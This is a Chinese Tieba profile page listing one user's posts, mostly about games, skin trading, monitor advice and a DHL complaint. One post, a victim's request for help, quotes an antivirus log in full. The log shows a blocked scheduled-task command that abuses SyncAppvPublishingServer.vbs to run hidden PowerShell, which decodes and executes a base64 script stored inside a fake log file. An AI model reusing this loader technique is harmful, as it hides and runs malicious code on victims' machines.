小🐷饲养员的个人资料 - RAT

小🐷饲养员戲齋

-

关注数: 0 粉丝数: 0 发帖数: 72 关注贴吧数: 38

大佬们，有人知道这是什么病毒吗？火绒每天都在拦截进程如下：【1】2022-09-20 03:09:49,系统防护,系统加固,SyncAppvPublishingServer.vbs触犯敏感动作防护规则, 已阻止防护项目：隐藏执行PowerShell 执行文件：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 执行命令行："C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; $a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block} 操作结果：已阻止进程ID：6464 操作进程：C:\Windows\System32\SyncAppvPublishingServer.vbs 操作进程命令行：C:\windows\System32\WScript.exe "C:\Windows\System32\SyncAppvPublishingServer.vbs" "n; $a=Get-Content "C:\Windows\logs\system-logs.txt" | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block 操作进程校验和：15F2FACFD05DAF46D2C63912916BF2887CEBD98A 父进程ID：1468 父进程：C:\Windows\System32\svchost.exe 父进程命令行：C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

求助！大佬们帮忙配一下队伍刚刚30级属实事没玩明白怎么配，大佬们给推荐一下啊！谢谢啦！

这才是真正的泳装娜美吧原版要能做成这样就好了

双十一求个带鱼屏推荐大佬们好我预算2500 主要玩fps和3A 也爱看电影想要买带鱼屏求推荐感谢感谢

吴彦祖版本和尚

求一个霓虹灯，走igxe 有的直接供货吧我在igxe求购了 130求

求一个Valentine Balaclava，走IGXE

有玩欧服的吗？昨天才买的游戏，找不到一起玩的，人在欧洲只能连得上欧服，可以discord语音，求大佬带带，第一次入手使命召唤系列，摸不透游戏，现在只会玩躲猫猫战网 Boblish#21538

刚刚收到了 nice，快递DHL 还给我送错了地方邻居给刚刚收到了 nice，快递DHL 还给我送错了地方邻居给我拿了过来绝了，DHL超级垃圾的快递不是第一次给我送错地方了

1 下一页